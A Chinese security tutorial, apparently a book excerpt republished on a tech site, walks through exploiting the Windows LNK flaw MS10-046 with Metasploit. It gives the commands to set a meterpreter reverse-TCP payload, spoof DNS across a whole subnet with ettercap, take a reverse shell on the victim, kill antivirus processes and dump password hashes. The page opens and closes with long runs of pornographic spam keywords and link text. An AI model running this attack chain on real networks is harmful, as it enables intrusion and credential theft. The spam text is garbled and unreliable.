精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

Metasploit Framework應(yīng)用實例:代碼漏洞攻擊

安全 數(shù)據(jù)安全
Windows支持使用快捷方式或LNK文件。LNK文件是指向本地文件的引用,點擊LNK文件與點擊快捷方式所指定的目標具有相同的效果。

Microsoft Windows快捷方式LNK文件自動執(zhí)行代碼漏洞攻擊(MS10-046)

Metasploit Framework軟件介紹及下載:http://netsecurity.51cto.com/art/201106/268429.htm

◆漏洞描述

1、漏洞定義

Windows支持使用快捷方式或LNK文件。LNK文件是指向本地文件的引用,點擊LNK文件與點擊快捷方式所指定的目標具有相同的效果。

Windows沒有正確地處理LNK文件,特制的LNK文件可能導(dǎo)致Windows自動執(zhí)行快捷方式文件所指定的代碼。這些代碼可能位于USB驅(qū)動、本地 或遠程文件系統(tǒng)、光驅(qū)或其他位置,使用資源管理器查看了LNK文件所在位置就足以觸發(fā)這個漏洞。默認下Windows啟動了自動加載和自動播放功能,因此 在連接可移動設(shè)備(如USB閃存)后Windows會自動打開資源管理器。其他顯示文件圖標的應(yīng)用也可用作這個漏洞的攻擊載體。受影響的Windows系統(tǒng)如下表1所示:

表1

漏洞名稱

受影響的Windows系統(tǒng)類型

MS10-046

Microsoft Windows XP SP3

Microsoft Windows XP SP2

Microsoft Windows Vista SP2

Microsoft Windows Vista SP1

Microsoft Windows Server 2008

Microsoft Windows Server 2008 SP2

Microsoft Windows Server 2008 R2

Microsoft Windows Server 2003 SP2

Microsoft Windows 7

2、關(guān)于補丁

Microsoft已經(jīng)為此發(fā)布了一個安全公告(MS10-046)以及相應(yīng)補丁:

MS10-046:Vulnerability in Windows Shell Could Allow Remote Code Execution (2286198),其詳細說明文檔的鏈接如下:

http://www.microsoft.com/china/technet/security/bulletin/MS10-046.mspx

此安全更新解決了Windows Shell 中一個公開披露的漏洞。 如果顯示特制的快捷方式圖標,則該漏洞可能允許遠程執(zhí)行代碼。成功利用此漏洞的攻擊者可以獲得與本地用戶相同的用戶權(quán)限。除了使用Windows系統(tǒng)自帶的自動更新來升級補丁外,也可以使用360安全衛(wèi)士之類的第三方工具來實現(xiàn)。#p#

◆攻擊操作

接下來,我們開始使用Metasploit3進行溢出攻擊,下面為詳細步驟。

步驟1:進入Metasploit,載入攻擊代碼。

作為攻擊者而言,首先是進入Metasploit。除了從菜單上直接點選進入Metasploit外,我們也可以在圖形界面下打開任意一個Shell,直接輸入msfconsole命令來進入Metasploit。如下圖-1所示,可以看到當前包含代碼數(shù)量、參數(shù)狀態(tài)及最新版本等。

圖-1

圖-1

命令如下:

search ms10_046

回車后即可看到如下圖-2所示的搜索結(jié)果,顯示存在一個名為"ms10_046_shortcut_icon_dllloader"的可用攻擊代碼。接下來,就可以載入該攻擊代碼,具體命令如下:

use windows/browser/ms10_046_shortcut_icon_dllloader

回車后如下圖所示,就載入了該攻擊代碼。

圖-2

圖-2

在使用一個攻擊代碼前,需要先查看其必需的設(shè)置參數(shù)有哪些,所以先要輸入如下命令:

show options

回車后即可看到該攻擊代碼的設(shè)置參數(shù),如下圖-3所示,在圖中間可以看到SRVHOST、SRVPORT、URIPATH這三個參數(shù)是必須的,其中,SRVPORT和URIPATH是已經(jīng)默認設(shè)置好的。

圖-3

圖-3 #p#

步驟2:在Metasploit3上配置攻擊代碼。

既然知道了必需的配置參數(shù),接下來就可以使用set命令來依次配置參數(shù)。其中,設(shè)置溢出有效載荷為反向溢出,而為了使用到Metasploit中的具備強化Shell功能的Meterpreter,所以設(shè)置為PAYLOAD為windows/metepreter/reverse_tcp此外,由于后面攻擊者還要使用ettercap對目標進行DNS欺騙攻擊,所以攻擊者應(yīng)要將反彈端口的目的地設(shè)置為自身IP,即設(shè)置LHOST為自身IP。最后,使用exploit執(zhí)行溢出。具體命令如下:

set   SRVHOST   攻擊者自身IP
set   PAYLOAD   windows/meterpreter/reverse_tcp
set   LHOST   攻擊者自身IP
exploit

依次輸入回車后如下圖-4所示,會顯示為啟用一個URL地址為http://10.23.0.3:80,對應(yīng)一個共享目錄\\10.23.0.3\owhBPhxMJ\。

圖-4

圖-4 #p#

步驟3:配置EtterCap,執(zhí)行DNS欺騙攻擊。

關(guān)于DNS欺騙攻擊會使用到Ettercap,這款工具的操作可以參考本書12章12.1節(jié)內(nèi)容。不過在使用Ettercap進行DNS欺騙攻擊之前,我們先修改一下Ettercap的dns模塊,即修改/usr/share/ettercap/etter.dns文件,格式為添加*.com、*.net、*.org及*.cn的解析指向為10.23.0.3。具體命令如下:

nano /usr/share/ettercap/etter.dns
cat  /usr/share/ettercap/etter.dns

執(zhí)行效果如下圖-5所示。

圖-5

圖-5

修改etter.dns完畢后,就可以開啟ettercap進行DNS欺騙攻擊了,具體命令如下:

ettercap -T -q -i eth0 -P dns_spoof // //

參數(shù)解釋:

-T 使用文字界面,建議不喜歡 GUI模式的朋友使用;

-q 指quiet模式,就是讓Ettercap表現(xiàn)得安靜些,少些不必要的文字報告;

-i 后跟網(wǎng)卡名稱,這里就是eth0;

-P 后跟需要載入的插件,這里就是dns_spoof插件;

// 指代任意MAC地址、任意IP地址,即全網(wǎng)段。

回車后即可看到如下圖-6所示。此時的Ettercap開始對當前網(wǎng)段實施DNS欺騙攻擊。

圖-6

圖-6

步驟4:收到反向溢出Shell,侵入目標主機。

此時,在目標主機(也可認為是受害者,采用Windows XP SP3系統(tǒng),IP地址為10.23.0.4)上打開瀏覽器,輸入網(wǎng)址http://google.com并回車,如下圖-7所示,會發(fā)現(xiàn)瀏覽器的響應(yīng)會變得緩慢。

圖-7

圖-7

稍等數(shù)秒后,我們會發(fā)現(xiàn)在目標主機上的瀏覽器上原本應(yīng)顯示為Google的主頁,突然變成了一個名為\\10.23.0.3\owhBPhxMJ的共享目錄。如下圖-8所示。

圖-8

圖-8

而此時,在攻擊者的主機上,在開啟EtterCap命令的Shell下,也同時出現(xiàn)了一些域名的請求被攔截及被同步欺騙到10.23.0.3上,如下圖-9所示,能看到一個向google.com的域名解析請求被EtterCap攔截并重定向到10.23.0.3上。

圖-9

回到Metasploit的Shell下,就會看到當DNS欺騙導(dǎo)致的重定向發(fā)生后,受害者被強制運行了攻擊者主機即10.23.0.3上Metasploit執(zhí)行的漏洞攻擊代碼。于是在成功溢出后,攻擊者拿到了一個反向溢出Shell。如下圖-10所示,黑框中標出的即可獲取到一個Meterpreter Session。

圖-10

圖-10

此時,攻擊者可以使用Ctrl+C中斷一下攻擊代碼的實時顯示,輸入back命令回到Metasploit的根目錄后,就可以使用session查看這個反向溢出Shell的ID號,然后再調(diào)用該ID即可。具體命令如下:

sessions
sessions  -i  1

參數(shù)解釋:

-i num 該參數(shù)用于調(diào)用不同ID號的成功溢出Shell,后跟的num為ID號。如下圖-11所示,顯示的當前可用Session只有1個,即成功溢出10.23.0.4后獲得的Shell。

依次輸入上述命令,就可以成功調(diào)用該反向溢出Shell。如下圖-11所示,由于之前設(shè)置為Metasploit內(nèi)置的特殊Shell-Meterpreter,所以此時會看到提示符從"msf"變成了"meterpreter"。

圖-11 #p#

步驟5:入侵后在目標主機執(zhí)行命令。

為了方便安全滲透測試人員可以更深入地研究漏洞的危害性,強化了的Meterpreter里也內(nèi)置了大量的工具及命令。舉幾個例子:

ps  列出當前運行的全部程序

如下圖-12所示,輸入ps回車后會顯示出該Windows上當前運行的全部程序進程,攻擊者將根據(jù)需要使用kill來殺掉某個進程,比如殺毒軟件。

圖-12

圖-12

為了擴展一下思路,我們再來看看如何獲取受害者主機上的密碼Hash。具體命令如下:

use  priv  使用特權(quán)工具

hashdump  獲取Windows所有用戶密碼Hash值

依次輸入上述命令然后回車后就可看到如下圖-13所示內(nèi)容,攻擊者成功地獲取到了目標主機上的全部用戶列表及對應(yīng)的密碼Hash表。這個Hash表的內(nèi)容只要導(dǎo)入Ophcrack之類的工具中就可以輕松地破解,而關(guān)于Ophcrack的具體使用大家可以參考本書的10.1節(jié),這里就不再重復(fù)描述。

圖-13

圖-13

當然,可能有的朋友要說,在這個meterpreter里面很難輸入Windows命令。哦,是的,貌似是這樣,但是沒關(guān)系,我們可以很容易地解決這個小問題。只要輸入shell這個命令,攻擊者就能夠進入到目標主機的CMD界面中。

如下圖-14所示,只需要駛?cè)雜hell,回車后攻擊者就可以進入到CMD的界面中,在這個界面里任何CMD下支持的命令都可以執(zhí)行,比如使用ipconfig來顯示當前IP地址。如下圖-14所示,我們確實看到當前IP顯示為10.23.0.4,對,我們現(xiàn)在就在受害者的主機里。至于添加賬戶之類的命令就由小黑們按照想法自行使用啦。

圖-14

圖-14

好了,到這里,Metasploit3的基本使用,我想大家都已經(jīng)學會了。

 

責任編輯:佟健 來源: 51CTO.com
相關(guān)推薦

2020-10-06 13:58:25

漏洞

2021-01-26 10:00:45

漏洞網(wǎng)絡(luò)安全網(wǎng)絡(luò)攻擊

2010-12-01 12:37:03

2011-06-13 14:15:02

2025-10-31 10:34:09

2023-06-15 11:59:05

2009-11-10 10:33:10

2013-04-27 14:35:40

2014-11-26 09:15:20

2014-06-26 11:33:42

2025-07-25 07:12:58

2017-08-09 17:09:47

2009-09-22 08:39:59

Hibernate F

2009-06-24 08:51:55

2020-10-16 10:30:28

黑客

2010-09-26 17:21:07

2009-01-27 20:36:00

2013-08-15 17:32:51

2012-12-19 10:36:06

2009-10-23 09:17:53

點贊
收藏

51CTO技術(shù)棧公眾號

亚洲视频二区| 久久91精品| 亚洲尤物视频在线| 欧美日韩国产综合视频在线| 最近中文字幕在线观看视频| 91精品99| 亚洲欧美中文日韩在线| 17c国产在线| 超碰在线99| 中文字幕欧美激情| 国产福利久久精品| 黄色污污网站在线观看| 欧美/亚洲一区| 亚洲香蕉伊综合在人在线视看| 做a视频在线观看| 色是在线视频| 亚洲精品国产一区二区三区四区在线 | 一区二区三区四区日韩| 亚洲国产精品999| 日本特黄a级片| 黄色激情在线播放| 亚洲欧美激情一区二区| 欧美在线3区| 丰满人妻妇伦又伦精品国产| 日韩中文字幕亚洲一区二区va在线 | 色综合久久久久久久久久久| 中文字幕一区二区三区四区五区人 | 蜜桃视频在线观看一区二区| 高清亚洲成在人网站天堂| 性爱在线免费视频| 久久99高清| 亚洲国产精品久久精品怡红院 | 日韩欧美少妇| 精品久久久视频| 国产91视频一区| 一区二区三区视频在线观看视频| 972aa.com艺术欧美| 91热精品视频| 亚洲性生活大片| 日韩经典一区二区| 欧美怡春院一区二区三区| 国产一级免费av| 在线一区免费| 久久偷看各类女兵18女厕嘘嘘| 91激情视频在线观看| 午夜欧洲一区| 日韩理论片久久| 大乳护士喂奶hd| 老司机成人在线| 精品乱人伦小说| 午夜视频在线免费看| 96sao精品免费视频观看| 欧美在线播放高清精品| 三年中国国语在线播放免费| 黑人巨大亚洲一区二区久| 天天亚洲美女在线视频| 成人性免费视频| av免费不卡| 天涯成人国产亚洲精品一区av| 成人精品视频在线播放| 成人性生交大片免费看网站| 亚洲午夜精品17c| 成品人视频ww入口| 多野结衣av一区| 欧美性黄网官网| 男女午夜激情视频| 成人看片在线观看| 欧美无砖砖区免费| 91高清国产视频| 精品国产鲁一鲁****| 日韩三级在线免费观看| 少妇伦子伦精品无吗| eeuss鲁片一区二区三区| 精品国产伦一区二区三区观看体验| 自拍视频第一页| 欧美日韩另类图片| 亚洲欧美色图片| 免费一级suv好看的国产网站| 97久久夜色精品国产| 久久亚洲影音av资源网| 久久精品视频9| 久久国产免费| 成人av电影天堂| 亚洲大尺度网站| 久久亚洲综合色| 亚洲欧洲一二三| 金瓶狂野欧美性猛交xxxx| 亚洲高清免费一级二级三级| 中文字幕无码不卡免费视频| 日韩一级特黄| 亚洲精品国产成人| 超碰人人干人人| 国产尤物精品| 国产精品激情av电影在线观看| 精品国产青草久久久久96| 国产一区二区三区精品欧美日韩一区二区三区 | 国产精品久久久精品四季影院| 国产综合婷婷| 国产99久久精品一区二区| 97超碰国产在线| 99久久久久免费精品国产| 日本一区美女| av电影免费在线看| 欧美美女视频在线观看| 特大黑人巨人吊xxxx| 首页国产精品| 97视频在线观看视频免费视频| 最近中文字幕在线免费观看| 国产成人精品午夜视频免费| 欧美日韩另类综合| 日本在线视频www鲁啊鲁| 色妞www精品视频| 国产精品无码自拍| 日产午夜精品一线二线三线| 韩国三级电影久久久久久| 一级aaaa毛片| 2020国产成人综合网| 伊人再见免费在线观看高清版| 在线免费av资源| 精品噜噜噜噜久久久久久久久试看 | 色诱女教师一区二区三区| 欧美成人aaaaⅴ片在线看| 久久精品国产99国产| 久久综合久久久| 黄色美女视频在线观看| 欧美精品1区2区3区| b站大片免费直播| 欧美一区二区三区久久精品| 国产精品美女999| 欧美色综合一区二区三区| 亚洲午夜一二三区视频| 中文字幕国产高清| 欧美成人milf| 国产精品一区二区电影| 狠狠色伊人亚洲综合网站l | 中文字幕在线观看免费| 91亚洲精品一区二区乱码| 成人免费在线网| 视频亚洲一区二区| 久久综合电影一区| 91免费视频播放| 国产精品视频线看| 一区二区三区韩国| 欧洲grand老妇人| 国产成人一区二区三区电影| 亚洲av成人精品日韩在线播放| 一区二区三区四区不卡在线| 91丝袜超薄交口足| 偷偷www综合久久久久久久| 国产精品久久久久久久久男 | 2017欧美狠狠色| 日韩av黄色网址| 日韩啪啪网站| 欧美中文在线视频| 精品999视频| 在线视频综合导航| 日本黄色小视频在线观看| 香蕉精品999视频一区二区| 久久国产一区| 欧美精品日日操| 一色桃子一区二区| 亚洲一区二区三区高清视频| 国产精品久久久久久亚洲毛片 | 亚洲经典中文字幕| 日本va欧美va国产激情| 91色porny在线视频| 日本精品www| 成人直播大秀| 91视频国产一区| 国产网红女主播精品视频| 亚洲国产成人精品久久| 久久久久99精品成人片我成大片| 久久综合五月天婷婷伊人| 成人三级视频在线播放| 成人精品视频| 91aaaa| 麻豆国产在线| 国产一区二区激情| 国产裸体永久免费无遮挡| 一区二区三区免费看视频| 一级黄色片毛片| 久久久久国产精品午夜一区| 涩涩日韩在线| 日韩精品三级| 欧美中文在线免费| 免费**毛片在线| 亚洲精品一区二区三区蜜桃下载 | 欧美日韩亚洲综合一区| 国产精品国产三级国产传播| 国产91精品精华液一区二区三区| 日本韩国欧美在线观看| 日本一区二区免费高清| 97人人澡人人爽| 少妇一区视频| 欧美巨大黑人极品精男| 欧美人体大胆444www| 欧美日韩国产123区| 久热这里只有精品在线| 国产亚洲欧洲一区高清在线观看| 五月天视频在线观看| 亚洲福利专区| 亚洲三区四区| 欧美尿孔扩张虐视频| 91热精品视频| 播放一区二区| 91国语精品自产拍在线观看性色 | 精品人妻一区二区三区换脸明星 | 亚洲精品中文字幕无码蜜桃| 亚洲综合色网| 日韩成人在线资源| 美女av一区| 亚洲999一在线观看www| 欧美成人精品一区二区男人小说| 欧美成人午夜激情在线| yw视频在线观看| 亚洲第一黄色网| 国产精品无码久久av| 色综合色综合色综合| 久久久久噜噜噜亚洲熟女综合| 日本一区二区久久| 免费成人深夜夜行p站| 国产91丝袜在线播放九色| 国产91色在线观看| 久久欧美肥婆一二区| 成人小视频在线观看免费| 禁断一区二区三区在线| 精品一区二区视频| 给我免费播放日韩视频| 91在线直播亚洲| 成人a在线观看高清电影| 国产69久久精品成人| 大香伊人中文字幕精品| 欧美成人合集magnet| 亚洲精品传媒| 这里只有精品丝袜| 国产毛片av在线| 精品爽片免费看久久| 日本人妻熟妇久久久久久| 日韩视频永久免费| 99热这里是精品| 91精品国产综合久久精品| 在线视频免费观看一区| 在线视频国内自拍亚洲视频| 欧美一区二区三区四| 午夜精品久久久久久久99水蜜桃 | av天在线观看| 中文在线不卡视频| 国产黄色在线| 中文字幕日韩在线观看| 成年网站在线| 中文字幕亚洲欧美| av大片在线观看| 日韩视频在线免费| 黄色av电影在线观看| 久久精品国产成人| 在线三级中文| 久久久天堂国产精品女人| av手机在线观看| 欧美一区二区三区精品电影| 男人最爱成人网| 国产精品普通话| 日韩黄色三级| 国产传媒一区二区| 亚洲精品中文字幕99999| 日本一区二区三区免费看| 久久中文视频| 公共露出暴露狂另类av| 欧美三级视频| 免费无码av片在线观看| 蜜臀99久久精品久久久久久软件| 亚洲欧洲日本精品| 国产麻豆一精品一av一免费 | av亚洲精华国产精华精华| 亚洲天堂美女视频| 国产日韩欧美一区二区三区综合| 九一在线免费观看| 亚洲美女精品一区| 国产第一页在线播放| 午夜视频在线观看一区二区| 男人的天堂av网站| 91精品国产综合久久久蜜臀粉嫩| 超碰在线观看av| 日韩成人激情视频| 日本在线免费播放| 欧美激情综合色| 免费成人动漫| 亚洲最大的网站| 亚洲va久久久噜噜噜久久| 亚洲啪啪av| 激情成人综合| 激情视频免费网站| 成+人+亚洲+综合天堂| 久久成人激情视频| 亚洲精品中文在线观看| 成人精品在线看| 欧美精品亚洲二区| 三级毛片在线免费看| 日韩一区在线视频| 午夜不卡影院| 亚洲aa在线观看| 欧美人与牛zoz0性行为| 日本三级中文字幕在线观看| 久久久久久自在自线| 中文字幕一二三| 国产三区在线成人av| 青青草手机在线观看| 欧美专区日韩专区| 午夜成人免费影院| 欧美美女操人视频| 天然素人一区二区视频| 国产一区福利视频| 91精品综合久久久久久久久久久| 女性女同性aⅴ免费观女性恋| 国精产品一区一区三区mba桃花 | www.久久成人| 中文字幕亚洲第一| 欧美黑人粗大| 激情小说网站亚洲综合网| 欧美国产一区二区三区激情无套| 国产原创popny丨九色| 国产一区二区三区av电影| 欧美福利第一页| 欧美日韩一区免费| 蜜臀久久99精品久久久| 久久最新资源网| 国产乱子精品一区二区在线观看| 国产一区高清视频| 韩国av一区| 久久久久久国产精品日本| 国产精品美女久久久久久久网站| 精品不卡一区二区| 亚洲精品国产美女| 白白色在线观看| ts人妖另类在线| 午夜天堂精品久久久久| 国产又黄又猛的视频| 中文av一区二区| 性高潮视频在线观看| 日韩大片在线观看视频| 超碰在线最新网址| 国产精品久久精品国产 | 秋霞无码一区二区| 大美女一区二区三区| 欧美国产在线看| 日韩精品一区国产麻豆| 午夜激情在线| 91国产丝袜在线放| 欧美特黄一区| 91精品又粗又猛又爽| 亚洲高清免费一级二级三级| 高清乱码毛片入口| 992tv成人免费视频| 久久视频在线观看| 可以在线看的av网站| aaa亚洲精品| 国产又大又黄又粗| 亚洲欧美在线磁力| 成人免费黄色| 在线视频精品一区| 国产精品99精品久久免费| 九九热精品在线观看| 精品国产91乱码一区二区三区| 啊啊啊久久久| 日韩啊v在线| 国产一区二三区| 国产亚洲成人av| 亚洲国产成人久久综合| 欧美日韩视频免费观看| 翔田千里亚洲一二三区| 国产在线精品一区二区| 激情五月婷婷小说| 精品无人区太爽高潮在线播放| 亚洲高清黄色| 日韩不卡视频一区二区| 丰满少妇久久久久久久| 黄色一级片免费看| 一本一道久久a久久精品逆3p | 欧美日韩国产精品成人| 中国av在线播放| 国外成人在线视频网站| 日韩高清不卡一区| 欧美成人精品欧美一级私黄| 亚洲电影中文字幕| 素人啪啪色综合| 91免费国产精品| 久久久久久久综合狠狠综合| 中文字幕在线观看国产| 久久久久久亚洲精品中文字幕| 综合综合综合综合综合网| 九一精品久久久| 精品久久久久久久久久 | 欧美丰满少妇xxxx| 猛男gaygay欧美视频| 国产乱叫456| 欧美日韩国产精品专区| 嫩草香蕉在线91一二三区| 国模精品一区二区三区| 韩日欧美一区二区三区| 国产成人一级片| 蜜臀久久99精品久久久无需会员 |